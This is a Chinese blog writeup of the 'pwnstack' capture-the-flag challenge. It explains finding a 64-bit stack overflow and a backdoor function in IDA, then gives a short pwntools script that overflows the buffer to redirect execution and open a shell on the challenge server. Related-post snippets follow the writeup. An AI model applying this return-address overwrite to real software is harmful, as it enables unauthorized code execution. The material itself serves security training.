攻防世界 pwnstack writeup

最新推荐文章于 2025-02-25 22:16:34 发布
最新推荐文章于 2025-02-25 22:16:34 发布
阅读量1.4k 收藏 10
点赞数 3
分类专栏: write up 文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73605862/article/details/130919537
版权
本文描述了一次解决攻防世界平台上的PWN题目pwnstack的过程。首先,检查了程序的安全特性,发现只有NX保护。接着在IDApro中进行静态分析,关注main函数和vuln函数中的buf。找到了/bin/sh字符串和后门函数地址。最后,编写并执行exploit,成功获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目(六):
【题型】PWN
【题目】pwnstack
【来源】(攻防世界)https://adworld.xctf.org.cn/challenges/list
【思路】栈溢出
【具体步骤】
Step1:checksec一下,发现程序是一个只有NX的64位程序
在这里插入图片描述

Step2:将程序放到IDApro下进行静态分析。
在这里插入图片描述

Step3:发现main函数,f5查看伪代码(如果键被占用,fn+f5)。
在这里插入图片描述

Step4:进入vuln()函数查看一下,发现有一个buf,查看发现从0xA0到0x08。
在这里插入图片描述
在这里插入图片描述

Step5:shift+F12查看字符串发现/bin/sh,进入发现后门函数,查看地址(ctr+x)发现为:0x400762

在这里插入图片描述
在这里插入图片描述

Step6:编写exp,输入后,ls查看文件,然后发现有一个叫flag的文件,cat查看文件,得到flag。
源码:

from pwn import *
p=remote("61.147.171.105",59432)
payload=b'a'*0xa8+p64(0x400762)
p.sendline(payload)
p.interactive()

在这里插入图片描述

攻防世界-pwn stack2(ROP)
菜的只能随便写写博客
10-28 2013
0x01 文件分析 32位elf 无PIE   0x02 运行分析  程序的功能主要有四个,在输入前面两个初始化的变量值之后,就可以看到后面的几个功能。   0x03 IDA分析 //IDA 静态分析得出的代码: int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax uns...
攻防世界 pseudorandom Writeup
qq_43547885的博客
02-17 771
攻防世界 pseudorandom Writeup 初步分析 在 IDA 中分析二进制文件 程序的主要逻辑还是比较好理解的,先是获得一个伪随机数 x,然后根据 x 初始化一些数,通过这些数去约束用户的输入 用户输入的数被用来计算 MD5,计算后与内置的 MD5 值进行比对,比对通过即可拿到 flag 可以看到主要是通过这个 verify 函数对输入进行的约束 分析 verify 函数 verify 的第一个参数最初由程序内部运算后给出,第二个参数是我们的输入。当第一个输入的数通过验证后,verif
PWN练习---Stack_1
qq_74259765的博客
06-25 1557
ctf--PWN方向一些做题经历wp
pwn学习笔记之stack
最新发布
m0_68956519的博客
02-25 795
之后caller函数调用结束,并继续调用下一个函数还记得最开始讲的cpu存储访问顺序吗?如果我们可以在一些危险函数get(),或者没有严格限制的read函数输入超过对应地址存储量的字符串,就可以覆盖掉返回地址,在函数调用结束时,返回地址就会被送入eip寄存器中,从而我们能够执行我们想要的动作。系统栈是由高地址往低地址增长的, 而数据的写入(局部变量)是按低地址到高地址的顺序写入. 如果程序没有对输入的字符数量做出限制, 就存在数据溢出当前栈帧以及覆盖返回地址的可能, 从而实现控制程序的执行流.
pwnstack-攻防世界
32bin的博客
04-01 673
【代码】pwnstack-攻防世界
攻防世界 pwn——pwnstack
CNS-Enterprise BCC-1701-J
06-01 1484
攻防世界 做题练习
攻防世界pwn——stack2
qq_62076255的博客
12-18 758
攻防世界pwn——stack2做题记录
攻防世界pwn题--stack2
L0g1c的博客
10-31 667
查看保护机制 (有栈不可执行NX,有canary保护) 用IDA分析(查看伪代码) int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax unsigned int v5; // [esp+18h] [ebp-90h] unsigned int v6; // [esp+1Ch] [ebp-8Ch] int v7; // [esp+20h] [ebp-88h] unsigned
攻防世界 supersqli writeup
12-14
进入题目查看源码,提到sqlmap那就扫一扫 发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能...
攻防世界WEB题WriteUp收集
AnKores的博客
01-02 947
题做到哪写到哪
攻防世界 pwn babyheap writeup
liucc09的博客
01-19 658
分析 这题题目中显示是Wellcome To the 2.27 Heap World,而且只能申请7个chunk,理论上应该是一道libc2.27 tcache的题,但因为在交互过程中触发了fastbin的double free错误,所以攻防世界上应该是把这题部署在了libc2.23的环境中,但无所谓,下面libc2.27和libc2.23的解法都会给出。 libc2.27解法 首先我们要泄漏libc的地址,tcache肯定是无法泄漏libc的,因此我们考虑使用unsorted bin来泄漏,这题有off
攻防世界String Writeup
只影的博客
03-04 2395
这道题暂且认为是攻防世界pwn新手区比较难的一道题,而难点主要在于读懂题目,读懂后就比较简单了。 查看程序的防御机制,发现除了PIE全开。从题目string可猜测,应该是个格式化字符串的漏洞。可以在Linux中先将程序跑一遍,对程序的流程和分支有个大概了解,本题是个简单的D&D类型的游戏题目。 用ida对程序进行分析,顺着程序的流程走,可以看到在sub_400BB9中有printf(&am...
pwn 攻防世界 stack2
A13837377363的博客
04-04 574
当时我检查了脚本很久,确认无误,gdb调试也确实修改了返回地址,但检查汇编代码发现,最后有 lea 指令改变了esp的值。查看源码,发现对修改数组没有做限制,很自然想到一个字节一个字节修改返回地址。要修改system的参数,幸好题目不算太坏,可以找到'sh\x00'字符串。2.做不出题目的时候,可以多看看汇编指令,可能有发现。在这道题耗了很多时间,有很多陷阱,记录一下。这是esp最后的地址,相差了0x10。即使你修改了,也会像这样打不通。这是一开始记录的ebp的地址。所以修改脚本,并且打通本地。
pwn日记:攻防世界最简单的栈溢出pwnstack
2301_80140310的博客
01-11 612
每天一道快乐pwn
攻防世界pwn难度1
weixin_63282980的博客
11-05 1877
攻防世界难度1的题目WP
攻防世界--- PWN学习笔记
m0_62879498的博客
12-03 493
PWN学习笔记 一,栈介绍 栈:栈是一种计算机系统中的数据结构,它按照先进后出的原则存储数据,先进入的数据被压入栈底,最后的数据在栈顶,需要读数据的时候从栈顶开始弹出数据(最后一个数据被第一个读出来),是一种特殊的线性表。栈的操作常用的有进栈(PUSH),出栈(POP),还有常用的标识栈顶和栈底。 进栈(PUSH):将一个数据放入栈里叫进栈(PUSH) 出栈(POP):将一个数据从栈里取出叫出栈(POP) 栈顶:常用寄存器ESP,ESP是栈指针寄存器,其内存放着一个指针,该指针永远指向系统栈最上面
攻防世界pwn高手区stack2 lea调整栈帧导致偏移错误
Gtooler的博客
10-14 1808
Stack2 这题废话很多,说白了就一个数组越界的漏洞可以利用,没有对下标v5做限定,所以可以利用数组越界,直接越过canary,利用留下的后门getshell 刚开始看ida以为位移是0x74所以exp如下 from pwn import * p = remote('111.200.241.244', '50928') # p = process("./stack2") # context.log_level = 'debug' hackhere = [0x9b, 0x85, 0x04, 0x08
攻防世界pwn刷题记录
yw__y的博客
03-12 527
攻防世界PWN进阶区(stack2)
BurYiA的博客
01-26 1011
stack2 哈,我又回来了 这个题呢,基本rop,但有几个点比较难弄… 比如:偏移不好求,环境中没有/bin/bash等… 言归正传,我们先看一下基本信息 32位程序,有NX,有Canary。 运行可以发现它可以创建一个存储数字的数组,创建好以后我们可以对其中的数据进行一些基本的操作,ok,接下来开始硬刚IDA 通过观察main函数伪代码我们可以发现上图这个位置有点小问题 这个时对数据进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值